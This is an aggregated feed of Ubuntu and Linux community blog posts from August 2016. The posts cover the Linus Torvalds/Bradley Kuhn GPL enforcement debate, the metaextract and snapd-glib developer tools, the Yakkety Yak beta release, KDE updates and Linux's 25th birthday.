August 30, 2016

Last week a bun-fight kicked off on the Linux kernel mailing list that led to some interesting questions about how and when we protect open source projects from bad actors. This also shone the light on some interesting community dynamics.

The touchpaper was lit when Bradley Kuhn, president of the Software Freedom Conservancy (an organization that provides legal and administrative services for free software and open source projects) posted a reply to Greg KH on the Linux kernel mailing list:

I observe now that the last 10 years brought something that never occurred before with any other copylefted code. Specifically, with Linux, we find both major and minor industry players determined to violate the GPL, on purpose, and refuse to comply, and tell us to our faces: “you think that we have to follow the GPL? Ok, then take us to Court. We won’t comply otherwise.” (None of the companies in your historical examples ever did this, Greg.) And, the decision to take that position is wholly in the hands of the violators, not the enforcers.

He went on to say:

In response, we have two options: we can all decide to give up on the GPL, or we can enforce it in Courts.

This rather ruffled Linus’s feathers who feels that lawyers are more part of the problem than the solution:

The fact is, the people who have created open source and made it a success have been the developers doing work – and the companies that we could get involved by showing that we are not all insane crazy people like the FSF. The people who have destroyed projects have been lawyers that claimed to be out to “save” those projects.

What followed has been a long and quite interesting discussion that is still rumbling on.

In a nutshell, this rather heated (and at times unnecessarily personal) debate has focused on when is the right time to defend the rights on the GPL. Bradley is of the view that these rights should be intrinsically defended as they are as important (if not more important) than the code. Linus is of the view that the practicalities of the software industry mean sending in the lawyers can potentially have an even more damaging effect as companies will tense up and choose to stay away.

Ethics and Pragmatism

Now, I have no dog in this race. I am a financial supporter of the Software Freedom Conservancy and the Free Software Foundation. I have an active working relationship with the Linux Foundation and I am friends with all the main players in this discussion, Linus, Greg, Bradley, Karen, Matthew, and Jeremy. I am not on anyone’s “side” here and I see value in the different perspectives brought to the table.

With that said, the core of this debate is the balance of ethics and pragmatism, something which has existed in open source and free software for a long time.

Linus and Bradley are good examples of either side of the aisle.

Linus has always been a pragmatic guy, and his stewardship of Linux has demonstrated that. Linus prioritizes the value of the GPL for practical software engineering and community-building purposes more-so than wider ideological free software ambitions. With Linus, practicality and tangible output come first.

Bradley is different. For Bradley, software freedom is first and foremost a moral issue. Bradley’s talents and interests lay with the legal and copyright aspects more-so than software engineering, so naturally his work has focused on licensing, copyright, and protection.

Now, this is not to suggest Linus doesn’t have ethics or that Bradley isn’t pragmatic, but their priorities are drawn in different areas. This results in differences in expectations, tone, and approach, with this debate being a good example.

Linus and Bradley are not alone here. For a long time there have been differences between organizations such as the Linux Foundation, the Free Software Foundation, and the Open Source Initiative. Again, each of these organizations draw their ethical and pragmatic priorities differently and they attract supporters who commonly share those similar lines in the sand.

I am a supporter of all of these organizations. I believe the Linux Foundation has had an unbelievably positive effect in normalizing and bridging the open source culture, methodology, and mindset to the wider business world. The Open Source Initiative have done wonderful work as stewards of licenses that thousands of organizations depend on. The Free Software Foundation has laid out a core set of principles around software freedom that are worthy for us all to strive for.

As such, I often take the view that everyone is bringing value, but everyone is also somewhat blinded by their own priorities and biases.

My Conclusion

Unsurprisingly, I see value in both sides of the debate.

Linus rightly raises the practicalities of the software industry. This is an industry in that is driven by a wide range of different forcing functions and pressures: politics, competition, supply/demand, historical precedent, cultural norms, and more. Many of these companies do great things, and some do shitty things. That is human beings for you.

As such, and like any industry, nothing is black and white. This isn’t as simple as Company A licenses code under the GPL and if they don’t meet the expectations of the license they should face legal consequences until they do. Each company has a delicate mix of these driving forces and Linus is absolutely right that a legal recourse could potentially have the inverse effect of reducing participation rather than improving it.

On the other hand, the GPL (or another open source license) does have to have meaning. As we have seen in countless societies in history, if rules are not enforced, humans will naturally try to break the rules. This always starts as small infractions but then ultimately grows more and more as the waters are tested. So, Bradley raises an important point, and while we should take a realistic and pragmatic approach to the norms of the industry, we do need people who are willing and able to enforce open source licenses.

The subtlety is in how we handle this. We need to lead with nuance and negotiation and not with antagonistic legal implications. The lawyers have to be a last resort and we should all be careful not to infer an overblown legal recourse for organizations that skirt the requirements of these licenses.

Anyone who has been working in this industry knows that the way you get things done in an organization is via a series of indirect nudges. We change organizations and industries with relationships, trust, and collaboration, and providing a supporting function to accomplish the outcome we want.

Of course, sometimes there has to be legal consequences, but this has to genuinely be a last resort. We need to not be under the illusion that legal action is an isolated act of protection. While legal action may protect the GPL in that specific scenario it will also freak out lots of people watching it unfold. Thus, it is critical that we consider the optics of legal action as much as the practical benefits from within that specific case.

The solution here, as is always the case, is more dialog that is empathetic to the views of those we disagree with. Linus, Bradley, and everyone else embroiled in this debate are on the right side of history. We just need to work together to find common ground and strategies: I am confident they are there.

What do you think? Do I have an accurate read on this debate? Am I missing something important? Share your thoughts below in the comments!

The post Linux, Linus, Bradley, and Open Source Protection appeared first on Jono Bacon.

on August 30, 2016 05:43 AM

August 29, 2016

Welcome to the Ubuntu Weekly Newsletter. This is issue #479 for the weeks of August 15 – 28, 2016, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Chris Sirrs
  • Simon Quigley
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

on August 29, 2016 11:58 PM

I recently blogged about Python packaging with py2pack . Meanwhile I created a new project called metaextract (available on github and pypi) based on the experience I made while improving py2pack.

metaextract does only one thing which is extracting the metadata from a python archive. Here’s an example – the output is JSON:

$ metaextact oslo.log-3.16.0.tar.gz 
{
 "data": {
 "data_files": null, 
 "entry_points": {
 "oslo.config.opts": [
 "oslo.log = oslo_log._options:list_opts"
 ]
 }, 
 "extras_require": {
 "fixtures": [
 "fixtures>=3.0.0 # Apache-2.0/BSD"
 ]
 }, 
 "has_ext_modules": null, 
 "install_requires": [
 "debtcollector>=1.2.0", 
 "oslo.config>=3.14.0", 
 "oslo.context>=2.6.0", 
 "oslo.i18n>=2.1.0", 
 "oslo.serialization>=1.10.0", 
 "oslo.utils>=3.16.0", 
 "pbr>=1.6", 
 "pyinotify>=0.9.6", 
 "python-dateutil>=2.4.2", 
 "six>=1.9.0"
 ], 
 "scripts": null, 
 "setup_requires": [
 "pbr>=1.8"
 ], 
 "tests_require": [
 "bandit>=1.1.0", 
 "coverage>=3.6", 
 "hacking<0.11,>=0.10.0", 
 "mock>=2.0", 
 "oslosphinx!=3.4.0,>=2.5.0", 
 "oslotest>=1.10.0", 
 "python-subunit>=0.0.18", 
 "reno>=1.8.0", 
 "sphinx!=1.3b1,<1.3,>=1.2.1", 
 "testrepository>=0.0.18", 
 "testscenarios>=0.4", 
 "testtools>=1.4.0"
 ]
 }, 
 "version": 1
}

The data is directly extracted from setuptools (or distutils). You can also run metaextract directly for a setup.py file:

$ python setup.py --command-packages=metaextract metaextract

or use it from your code:

$ python
>>> import pprint
>>> from metaextract import utils as meta_utils
>>> pprint.pprint(meta_utils.from_archive("oslo.log-3.16.0.tar.gz"))
{u'data': {u'data_files': None,
 u'entry_points': {u'oslo.config.opts': [u'oslo.log = oslo_log._options:list_opts']},
 u'extras_require': {u'fixtures': [u'fixtures>=3.0.0 # Apache-2.0/BSD']},
 u'has_ext_modules': None,
 u'install_requires': [u'debtcollector>=1.2.0',
 u'oslo.config>=3.14.0',
 u'oslo.context>=2.6.0',
 u'oslo.i18n>=2.1.0',
 u'oslo.serialization>=1.10.0',
 u'oslo.utils>=3.16.0',
 u'pbr>=1.6',
 u'pyinotify>=0.9.6',
 u'python-dateutil>=2.4.2',
 u'six>=1.9.0'],
 u'scripts': None,
 u'setup_requires': [u'pbr>=1.8'],
 u'tests_require': [u'bandit>=1.1.0',
 u'coverage>=3.6',
 u'hacking<0.11,>=0.10.0',
 u'mock>=2.0',
 u'oslosphinx!=3.4.0,>=2.5.0',
 u'oslotest>=1.10.0',
 u'python-subunit>=0.0.18',
 u'reno>=1.8.0',
 u'sphinx!=1.3b1,<1.3,>=1.2.1',
 u'testrepository>=0.0.18',
 u'testscenarios>=0.4',
 u'testtools>=1.4.0']},
 u'version': 1}

on August 29, 2016 05:53 PM

Screen Shot 2016-08-28 at 9.58.32 PM

Just a short reminder that tomorrow, Tuesday 30th August 2016 at 9am Pacific (see other time zone times here) I will be doing a Reddit AMA about community strategy/management, developer relations, open source, music, and anything else you folks want to ask about.

Want to ask questions about Canonical/GitHub/XPRIZE? Questions about building great communities? Questions about open source? Questions about politics or music? All questions are welcome!

To join, simply do the following:

  • Be sure to have a Reddit account. If you don’t have one, head over here and sign up.
  • On Tuesday 30th August 2016 at 9am Pacific (see other time zone times here) I will share the link to my AMA on Twitter (I am not allowed to share it until we run the AMA). You can look for this tweet by clicking here.
  • Click the link in my tweet to go to the AMA and then click the text box to add your question(s).
  • Now just wait until I respond. Feel free to follow up, challenge my response, and otherwise have fun!

I hope to see you all tomorrow!

The post Join my Reddit AMA Tomorrow appeared first on Jono Bacon.

on August 29, 2016 03:00 PM

Quite some time ago I sat down with Timo Jyrinki, a Canonical employee but more importantly, a Ubuntu community member who is involved with the local community team here in Finland. During the time we spent at the café we talked about a need to refresh the website for the Finnish LoCo team.

Relatively shortly after that we landed a few quick patches for the website to fix the most obvious problems with Timo and Jiri Grönroos. After having done this, we all knew that the patches would only be more or less temporary, so I started working on a theme that the team could use.

While the original intention was to get a theme that would be a replacement for the current Finnish community teams website, it became apparent to me that other teams would likely prefer a new theme as well. Having figured this out, I kept flexibility and customizability in mind.

A few years after the first discussion about the theme, I’m happy to announce that the first public release of the Ubuntu community teams WordPress theme is out (for a while already).

What does it look like?

Well, it looks quite a bit like the Ubuntu website.

Ubuntu community teams WordPress theme

Of course, being a theme for a large community, you can customize it to look more to your liking, without having to worry about anything breaking.

Ubuntu community teams WordPress theme (customized)

Ready to go?

If your site is managed by the Canonical IS, ask them to enable the Ubuntu community WordPress theme for you – for clarity, you can link them to the Launchpad project ubuntu-community-wordpress-theme. They have agreed to maintain the theme centrally, so you will always get all updates and fixes to the theme as soon as they are released (and the changes have gone through their review).

If you manage your site yourself, you can get the code either from the Launchpad project mentioned above, or the source – Github repository ubuntu-community-wordpress-theme. The instructions on how to set up the theme can be found on the README.

Either way you will be using the theme, some pointers on getting the most out of the theme can be found on the README.

Any questions?

If you have any questions, feedback or even feature requests, be in touch. I will happily help you with setting up the theme and making the Ubuntu community sites more beautiful.

on August 29, 2016 02:13 PM
It’s time once again for the Ubuntu Free Culture Showcase!

The Ubuntu Free Culture Showcase is a way to celebrate the Free Culture movement, where talented artists across the globe create media and release it under licenses that encourage sharing and adaptation. We're looking for content which shows off the skill and talent of these amazing artists and will greet Ubuntu 16.10 users.

More information about the Free Culture Showcase is available at https://wiki.ubuntu.com/UbuntuFreeCultureShowcase

This cycle, we're looking for beautiful wallpaper images that will literally set the backdrop for new users as they experience Ubuntu 16.10 for the first time.  Submissions will be handled via Flickr at https://www.flickr.com/groups/ubuntu-fcs-1610/

I'm looking forward to seeing the next round of entrants and a difficult time picking final choices to ship with Ubuntu 16.10.
on August 29, 2016 11:13 AM
Unusually early this time, Rhythmbox 3.4 has been released. Its available for Yakkety users – but I’ve done some judicious hacking and its now also available for 16.04 users as well. (screenshot taken with rhythmbox 3.4 + my alternative-toolbar plugin) … Continue reading
on August 29, 2016 06:40 AM

August 28, 2016

Over the past month I've been hitting excessive thermal heating on my laptop and kidle_inject has been kicking in to try and stop the CPU from overheating (melting!).  A quick double-check with older kernels showed me that this issue was not thermal/performance regression caused by software - instead it was time to clean my laptop and renew the thermal paste.

After some quick research, I found that Artic MX-4 Thermal Compound provided an excellent thermal conductivity rating of 8.5W/mK so I ordered a 4g sample as well as a can of pressurized gas cleaner to clean out dust.

The X230 has an excellent hardware maintenance manual, and following the instructions I stripped the laptop right down so I could pop the heat pipe contacts off the CPU and GPU.  I carefully cleaned off the old dry and cracked thermal paste and applied about 0.2g of MX-4 thermal compound to the CPU and GPU and re-seated the heat pipe.  With the pressurized gas I cleaned out the fan and airways to maximize airflow over the heatpipe.   The entire procedure took about an hour to complete and for once I didn't have any screws left over after re-assembly!

I normally take photos of the position of components during the strip down of a laptop for reference in case I cannot figure out exactly how parts are meant to fix on the re-assembly phase.  In this case, the X230 maintenance manual is sufficiently detailed so I didn't take any photos this time.

I'm glad to report that my X230 is now no-longer overheating. Heat is being effectively pumped away from the CPU and GPU and one can feel the additional heat being pushed out of the laptop.  Once again I can fully max out the CPU and GPU without passive thermal cooling mechanisms being kicked into action, so I've now got 100% of my CPU performance back again; as good as new!

Now and again I see laptop overheating bugs being filed in LaunchPad.  While some are legitimate issues with broken software, I do wonder if the majority of issues with the older laptops is simply due to accumulation of dust and/or old and damaged thermal paste.
on August 28, 2016 05:30 PM

August 27, 2016

facelift

Sebastian Kügler

I’ve done a facelift to my website. The new version is more mobile-friendly, modern-looking and quite a departure visually from its original look. I’ve chosen for a newpaper-like, typography-based responsive layout. My site finally also supports SSL, thanks to let’s encrypt.

Going to Akademy
Next week, I’ll be going to Akademy, which is co-hosted with QtCon. As usual, my focus will be around Plasma-related topics. I’ll also hold a presentation about a KDE software store.

on August 27, 2016 11:47 PM
Hi to all, this is a small issue I had the last days. Use a calculator in the terminal. I have been working and sometimes need to do an arithmetic operation so I decided to open  calc (Ubuntu Calculator Default). But I was wondering, there has to be a way to use a calculator in the CLI. So after some search in the engine I found this question in Ask Ubuntu and tried several options.

I will only write about the  best solution I found for my needs. In the question, you can find several solutions and probably you will find a different solution that will be best for you.

CALC (Arbitrary precision calculator)

Calc is an arbitrary precision arithmetic system that uses a C-like language. Calc is useful as a calculator, an algorithm prototyper and as a mathematical research tool. More importantly, calc provides one with a machine independent means of computation. Calc comes with a rich set of builtin mathematical and programmatic functions.

If you want to install calc you can use the following command:

sudo apt-get install apcalc

on August 27, 2016 11:44 PM

This is about a fun little project I already wrote a few months ago, completely unrelated to other things I’m usually writing about, but I thought it might be useful for others too.

When I moved to Greece last year, I had the problem that there were not many news websites that provided local news in English and actually had an RSS feed. And having local news, next to global ones about what happens all over the world, seems like a good idea to know what happens close around you.
The only useful website I found was Ekathimerini. There were two others that seemed useful to have, The Press Project (a crowd-funded project) and To Vima, both of which don’t have an RSS feed (or not for their English version). Of course the real solution to this problem is to learn Greek, which I’m doing now but that’s going to take a while until I’m able to understand news articles without too much effort.

So what did I do? I wrote a small web service that parses the HTML of those websites and returns an RSS feed based on that, together with having it update regularly in the background and keeping some history of items. You can find it here: html-rss-proxy. The resulting RSS feeds seem to work very well in Liferea and Newsblur at least.

Since then it was also extended by another news website, and generally it’s rather simple to add new ones to the code. You just need to figure out how to extract the relevant information from the HTML of some website and then convert that into code like here and wrap it up in the general interface that the other parts of the code expect, like here.

If you add some website yourself, feel free to send me a pull request and I’ll merge it!

Technical bits

On the technical side, this seems to be one of the most stable pieces of software I ever wrote. It never crashed or otherwise failed since I started running it, and fortunately I also didn’t have to update the HTML parsing code yet because of website changes.

It’s written in Haskell, using the Scotty web framework, Cereal serialization library for storing the history of the past articles, http-conduit for fetching the websites, and html-conduit for parsing the HTML. Overall a very pleasant experience, thanks to the language being very convenient to write and preventing most silly mistakes at compile-time, and the high quality of the libraries.

The only part I’m not yet too happy about is the actual HTML parsing, it seems to verbose and redudant. I might port it to another library at a later time, maybe xml-html-conduit-lens.

Update

After saying that I don’t like the HTML parsing, I actually reimplemented it around xml-html-conduit-lens now. The result is much shorter code and it resembles the structure of the HTML, as you can see here for example.

Considering that people always say that lens is so complicated, and this is more than simple getters, I have to say it went rather painless. Only the compiler errors if the types don’t match are a bit tricky to understand at first.

on August 27, 2016 03:02 PM

August 26, 2016

Qt 5 based Colorpick

Aurélien Gâteau

Colorpick is one of my little side-projects. It is a tool to select colors. It comes with a screen color picker and the ability to check two colors contrast well enough to be used as foreground and background colors of a text.

Contrast check

Three instances of Colorpick showing how the background color can be adjusted to reach a readable text.

The color picker

The color picker in action. The cursor can be moved using either the mouse or the arrow keys.

I wrote this tool a few years ago, using Python 2, PyQt 4 and PyKDE 4. It was time for an update. I started by porting it to Python 3, only to find out that apparently there are no Python bindings for KDE Frameworks...

Colorpick uses a few kdelibs widgets, and some color utilities. I could probably have rewrote those in PyQt 5, but I was looking for a pretext to have a C++ based side-project again, so instead I rewrote it in C++, using Qt5 and a couple of KF5 libraries. The code base is small and PyQt code is often very similar to C++ Qt code so it only took a few 45 mn train commutes to get it ported.

If you are a Colorpick user and were sad to see it still using Qt 4, or if you are looking for a color picker, give it a try!

on August 26, 2016 07:07 PM

August 25, 2016

Introducing snapd-glib

Robert Ancell

World, meet snapd-glib. It's a new library that makes it easy for GLib based projects (e.g. software centres) to access the daemon that allows you to query, install and remove Snaps. If C is not for you, you can use all the functionality in Python (using GObject Introspection) and Vala. In the future it will support Qt/QML through a wrapper library.

snapd uses a REST API and snapd-glib very closely matches that. The behaviour is best understood by reading the documentation of that API. To give you a taste of how it works, here's an example that shows how to find and install the VLC snap.

Step 1: Connecting to snapd

The connection to snapd is controlled through the SnapdClient object. This object has all the methods required to communicate with snapd. Create and connect with:

    g_autoptr(SnapdClient) c = snapd_client_new ();
    if (!snapd_client_connect_sync (c, NULL, &error))
        // Something went wrong


Step 2: Find the VLC snap 

Asking snapd to perform a find causes it to contact the remote Snap store. This can take some time so consider using an asynchronous call for this. This is the synchronous version:

    g_autoptr(GPtrArray) snaps =
        snapd_client_find_sync (c,
                                SNAPD_FIND_FLAGS_NONE, "vlc",
                                NULL, NULL, &error);
    if (snaps == NULL)
        // Something went wrong
    for (int i = 0; i < snaps->len; i++) {
        SnapdSnap *snap = snaps->pdata[i];
        // Do something with this snap information
    }


Step 3: Authenticate 

Some methods require authorisation in the form of a Macaroon (the link is quite complex but in practise it's just a couple of strings). To get a Macaroon you need to provide credentials to snapd. In Ubuntu this is your Ubuntu account, but different snapd installations may use another authentication provider.

Convert credentials to authorization with:

    g_autoptr(SnapdAuthData) auth_data =
        snapd_client_login_sync (c,
                                 email, password, code,
                                 NULL, &error);
    if (auth_data == NULL)
        return EXIT_FAILURE;


Once you have a Macaroon you can store it somewhere and re-use it next time you need it. Then the authorization can be created with:

    g_autoptr(SnapdAuthData) auth_data =
        snapd_auth_data_new (macaroon, discharges);
    snapd_client_set_auth_data (c, auth_data);

Step 4: Install VLC 

In step 2 we could determine the VLC snap has the name "vlc". Since this involves downloading ~100Mb and is going to take some time the asynchronous method is used. There is a callback that gives updates on the progress of the install and one that is called when the operation completes:
 
    snapd_client_install_async (c,
                                "vlc", NULL,
                                progress_cb, NULL,
                                NULL,
                                install_cb, NULL);


static void
progress_cb (SnapdClient *client,

             SnapdTask *main_task, GPtrArray *tasks,
             gpointer user_data)
{

    // Tell the user what's happening
}

static void
install_cb (GObject *object, GAsyncResult *result,

            gpointer user_data)
{
    g_autoptr(GError) error = NULL;

    if (snapd_client_install_finish (SNAPD_CLIENT (object),

                                     result, &error))
        // It installed!
    else
        // Something went wrong...
}


Conclusion 

With snapd-glib and the above code as a starting point you should be able to start integrating Snap support into your project. Have fun!
on August 25, 2016 10:59 PM
Lubuntu Yakkety Yak Beta 1 (soon to be 16.10) has been released! We have a couple papercuts listed in the release notes, so please take a look. A big thanks to the whole Lubuntu team and contributors for helping pull this release together. You can grab the images from here: http://cdimage.ubuntu.com/lubuntu/releases/yakkety/beta-1/
on August 25, 2016 10:50 PM

The Jogpa, in our mad flight, cut off a long lock of the yak’s silky hair. Having secured this, he appeared to be quite satisfied, let go, and sheathed his sword.

– Arnold Henry Savage Landor

The first beta of the Yakkety Yak (to become 16.10) has now been released!

This milestone features images for Lubuntu, Ubuntu GNOME, Ubuntu Kylin, Ubuntu MATE, Ubuntu Studio.

Pre-releases of the Yakkety Yak are not encouraged for anyone needing a stable system or anyone who is not comfortable running into occasional, even frequent breakage. They are, however, recommended for Ubuntu flavor developers and those who want to help in testing, reporting and fixing bugs as we work towards getting this bos grunniens ready.

Beta 1 includes a number of software updates that are ready for wider testing. These images are still under development, so you should expect some bugs.

While these Beta 1 images have been tested and work, except as noted in the release notes, Ubuntu developers are continuing to improve the Yakkety Yak. In particular, once newer daily images are available, system installation bugs identified in the Beta 1 installer should be verified against the current daily image before being reported in Launchpad. Using an obsolete image to re-report bugs that have already been fixed wastes your time and the time of developers who are busy trying to make 16.10 the best Ubuntu release yet. Always ensure your system is up to date before reporting bugs.

Lubuntu

Lubuntu is a flavor of Ubuntu based on LXDE and focused on providing a very lightweight distribution.

The Lubuntu 16.10 Beta 1 images can be downloaded from:

More information about Lubuntu 16.10 Beta 1 can be found here:

Ubuntu GNOME

Ubuntu GNOME is a flavour of Ubuntu featuring the GNOME desktop environment.

The Ubuntu GNOME 16.10 Beta 1 images can be downloaded from:

More information about Ubuntu GNOME 16.10 Beta 1 can be found here:

Ubuntu Kylin

Ubuntu Kylin is a flavour of Ubuntu that is more suitable for Chinese users. The Ubuntu Kylin 16.10 Beta 1 images can be downloaded from:

More information about Ubuntu Kylin 16.10 Beta 1 can be found here:

Ubuntu MATE

Ubuntu MATE is a flavour of Ubuntu featuring the MATE desktop environment for people who just want to get stuff done. The Ubuntu MATE 16.10 Beta 1 images can be downloaded from:

More information about Ubuntu MATE 16.10 Beta 1 can be found here:

Ubuntu Studio

Ubuntu Studio is a flavour of Ubuntu configured for multimedia production. The Ubuntu Studio 16.10 Beta 1 images can be downloaded from:

More information about Ubuntu Studio 16.10 Beta 1 can be found here:

If you’re interested in following the changes as we further develop the Yakkety Yak, we suggest that you subscribe to the ubuntu-devel-announce list. This is a low-traffic list (a few posts a month) carrying announcements of approved specifications, policy changes, beta releases and other interesting events.

http://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-announce

A big thank you to the developers and testers for their efforts to pull together this Beta release!

In addition, we would like to wish Linux a happy 25th birthday!

Originally posted to the ubuntu-release mailing list on Thu Aug 25 22:14:28 UTC 2016 by Set Hallstrom and Simon Quigley on behalf of the Ubuntu Release Team

on August 25, 2016 10:33 PM

The Breath of Time

Alessio Treglia

 

For centuries man has hunted, he brought the animals to pasture, cultivated fields and sailed the seas without any kind of tool to measure time. Back then, the time was not measured, but only estimated with vague approximation and its pace was enough to dictate the steps of the day and the life of man. Subsequently, for many centuries, hourglasses accompanied the civilization with the slow flow of their sand grains. About hourglasses, Ernst Junger writes in “Das Sanduhrbuch – 1954” (no English translation): “This small mountain, formed by all the moments lost that fell on each other, it could be understood as a comforting sign that the time disappears but does not fade. It grows in depth”.

For the philosophers of ancient Greece, the time was just a way to measure how things move in everyday life and in any case there was a clear distinction between “quantitative” time (Kronos) and “qualitative” time (Kairòs). According to Parmenides, time is guise, because its existence…

<Read More…[by Fabio Marzocca]>

on August 25, 2016 04:33 PM

KDevelop, Muon, Plasma 5.7.4

Jonathan Riddell

To celebrate the release of KDevelop 5 we’ve added KDevelop 5 to KDE neon User Edition.  Git Stable and Git Unstable builds are also in the relevant Developer Editions.

But wait.. that’s not all.. the package manager Muon seem to have a new maintainer so to celebrate we added builds in User Edition and Git Unstable Developer Edition.

Plasma 5.7.4 has been out for some time now so it’s well past time to get it into Neon, delayed by a move in infrastructure which caused the entire repository to rebuild.  All Plasma packages should be updated now in KDE neon User Edition.

Want to install it? The weekly User Edition ISO has been updated and looks lovely.

Facebooktwittergoogle_pluslinkedinby feather
on August 25, 2016 03:30 PM

linux-logo
Happy 25th birthday Linux. It’s a monumental milestone!

Over the years Canonical has been working on putting Linux in the hands of millions of people and worked with various hardware vendors to release over 1000 models of Linux hardware (!)

Today we’re celebrating by showcasing 25 Ubuntu devices released over the years from laptop, netbook, tower computer, phone, tablets, development boards, drones to robotic spiders. We hope you enjoy the list – there are some golden oldies – and we look forward to the next 25 years!

Plus if you have a favourite device from the list (or not), why not let us know by tweeting #UbuntuDevices – enjoy!

25 Ubuntu Devices

1. system 76 v.2 1. System 76 (June 2005) System76 was the first hardware vendor to offer packaged Ubuntu laptops, desktops and servers!
2. dell mini 2. Dell Inspiron Mini 9 (Sep 2008) The Dell Inspiron Mini Series was a line of subnotebook/netbook computers designed by Dell
3. ZaReason Verix 545 (Jun 2010) ZaReason only makes Linux computers
3. hp 4. HP mini 5103 (Sep 2010) Another netbook!
4. hp 5. Hp compaq 4000 (Jan 2011) A stable and reliable PC mainly for business use
5.wyse 6. Dell Wyse T50 (Sep 2011) Fast and affordable thin client for Cloud Client Computing Deployments
7. Asus Eee PC 1015CX – (March 2012) Netbooks are still in favour… getting smaller and cheaper!
8. Acer Veriton Z (Jan 2013) One of the many towers running Ubuntu
9. Turtlebot 2 (March 2013) The 2nd iteration of the robotic development platform
8. bq e45 10. BQ E4.5 (Feb 2015) And here it is – our very first Ubuntu Phone!
9.rpi2b 11. Raspberry Pi 2 (Feb 2015) A collaboration with the Raspberry Pi Foundation where Snappy Ubuntu Core is available for the Raspberry Pi 2
10.Meizu mx4 12. Meizu MX4 (July 2015) Our first release with Chinese partners, Meizu
13.Lenovo 13. Lenovo Thinkpad L450 (July 2015) Continually shipping Ubuntu pre-installed on laptops worldwide
14.Intel 14. Intel Compute Stick (July 2015) Enabling the transformation of a display into a fully functioning computer for home use or digital signage!
15. Erle spider 15. Erle Spider (Sep 2015) The first legged drone powered by ROS and running snappy Ubuntu Core
16. Dell XPS 15 (October 2015) The second iteration of this laptop built for developers who need powerful Linux desktop!
16. robotics 17. Robotics OP2 (Oct 2015) All we can say is, he was a hit at MWC 16!
17.DJI 18. DJI Manifold (Nov 2015) A high-performance embedded computer designed specifically to fly
18. bq m10 19. BQ Aquaris M10 (Feb 2016) Reinventing the personal mobile computing experience with our first converged device
19. meizu pro 5 20. Meizu PRO 5 (Feb 2016) Our most powerful phone to date!
20.Nuc 21. Intel NUC (Feb 2016) A platform for developers to test and create x86-based IOT solutions using snappy Ubuntu Core also used for digital signage solutions
samsung 22. Samsung Artik 5+10 (May 2016) Developer images available on 2x boards!
22.Bubblegum 23. Bubblegum 96 board (July 2016) Image of Ubuntu Core available for uCRobotics on this awesome board
23. mycroft 24. Mycroft (July 2016) The open source answer to natural language platform
24. intel 25. Intel Joule board (Aug 2016) A new development board in the Ubuntu family, targetting IoT and robotics makers

Want to find out how to develop for all these great devices? Develop with Ubuntu

on August 25, 2016 02:52 PM

S09E26 – Mosaic Promise - Ubuntu Podcast

Ubuntu Podcast from the UK LoCo

It’s Episode Twenty-six of Season Nine of the Ubuntu Podcast! Mark Johnson, Alan Pope, Laura Cowen, and Martin Wimpress are here again.

We’re here – all of us!

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

on August 25, 2016 02:00 PM

25_birthday

I embarked on the Linux journey in 2004 when I joined the newly founded Canonical and its not-yet-named Ubuntu team. I knew there was incredible opportunity around Linux but even then it wasn’t clear how pervasive Linux would become in all corners of technology, industry and society. Linux started its journey as a platform for researchers and developers and over the last 25 years it has become the innovator’s production platform across all computing platforms we use today. Perhaps it is fairer to say that the world has become developer-led, and since Linux is the first choice of developers, the world has adopted Linux by default. Servers, mobile, IoT and more all primarily run on Linux because the developers who make the most interesting things generally start on Linux.

Canonical is proud to support Linux with Ubuntu as the developer platform of choice. Enabling developers to be agile and effective is the best way to encourage the next wave of technical innovation. The leaders in drones, robotics, blockchain, artificial intelligence, self driving cars, computer visions are all blazing their trail on Ubuntu today and they are the technologies that will shape our lives in the coming years. Canonical shapes Ubuntu to be the fastest, easiest and most economical way to deliver innovation in real products – from the cloud to the edge of the network.

We’re also incredibly proud to continue to support Linux’s journey as the production platform for the enterprise and telecoms infrastructure we see today. Ubuntu is used in more than 55% of the production OpenStack clouds around the world. Enterprise and Telco deployments on Ubuntu have changed the way business deploys IT infrastructure. And we are already leading on what’s next for the future of cloud computing with NFV, Containerisation, and Machine Learning. On the IoT front we’re reshaping the nature of the device and the software operations experience for distributed computing with Ubuntu Core, built for IoT deployments where transactional upgrades, constrained environments, and security are the primary requirements.

While the cloud runs almost entirely on Linux, we think the desktop remains an important focus for Linux innovation too. Ubuntu started from the desktop, and is still innovating with the creation of a unique experience that converges the mobile and desktop worlds. Containers of all forms – docker, LXD and snap packaging are a new way for developers to design, distribute and run applications across clouds, devices and distributions.

So what does the next 25 years look like? As they say, the future is already here, just not evenly distributed. With machine learning progress going exponential, I think societies in future can expect to put even more trust in software for their everyday needs, and I’m glad that the trend is increasingly in favour of software that is shared, that is free for all to build upon, and that can be examined and improved by anybody. Public benefit depends on private innovation, and the fact that Linux as an open platform exists enables that innovation to come from anywhere. That’s something to celebrate. Happy birthday, Linux!

on August 25, 2016 08:00 AM

August 24, 2016

cube-small
Plasma 5.8 will be our first long-term supported release in the Plasma 5 series. We want to make this a release as polished and stable as possible. One area we weren’t quite happy with was our multi-screen user experience. While it works quite well for most of our users, there were a number of problems which made our multi-screen support sub-par.
Let’s take a step back to define what we’re talking about.

Multi-screen support means that connecting more than one screen to your computer. The following use cases give good examples of the scope:

  • Static workstation A desktop computer with more than one display connected, the desktop typically spans both screens to give more screen real estate.
  • Docking station A laptop computer that is hooked up to a docking station with additional displays connected. This is a more interesting case, since different configurations may be picked depending on whether the laptop’s lid is closed or not, and how the user switches between displays.
  • Projector The computer is connected to a projector or TV.

The idea is that the user plugs in or starts up with that configuration, if the user has already configured this hardware combination, this setup is restored. Otherwise, a reasonable guess is done to put the user to a good starting point to fine-tune the setup.

kcm-videowall
This is the job of KScreen. At a technical level, kscreen consists of three parts:

  • system settings module This can be reached through system settings
  • kscreen daemon Run in a background process, this component saves, restores and creates initial screen configurations.
  • libkscreen This is the library providing the screen setup reading and writing API. It has backends for X11, Wayland, and others that allow to talk to the exact same programming interface, independent of the display server in use.

At an architectural level, this is a sound design: the roles are clearly separated, the low-level bits are suitably abstracted to allow re-use of code, the API presents what matters to the user, implementation details are hidden. Most importantly, aside from a few bugs, it works as expected, and in principle, there’s no reason why it shouldn’t.

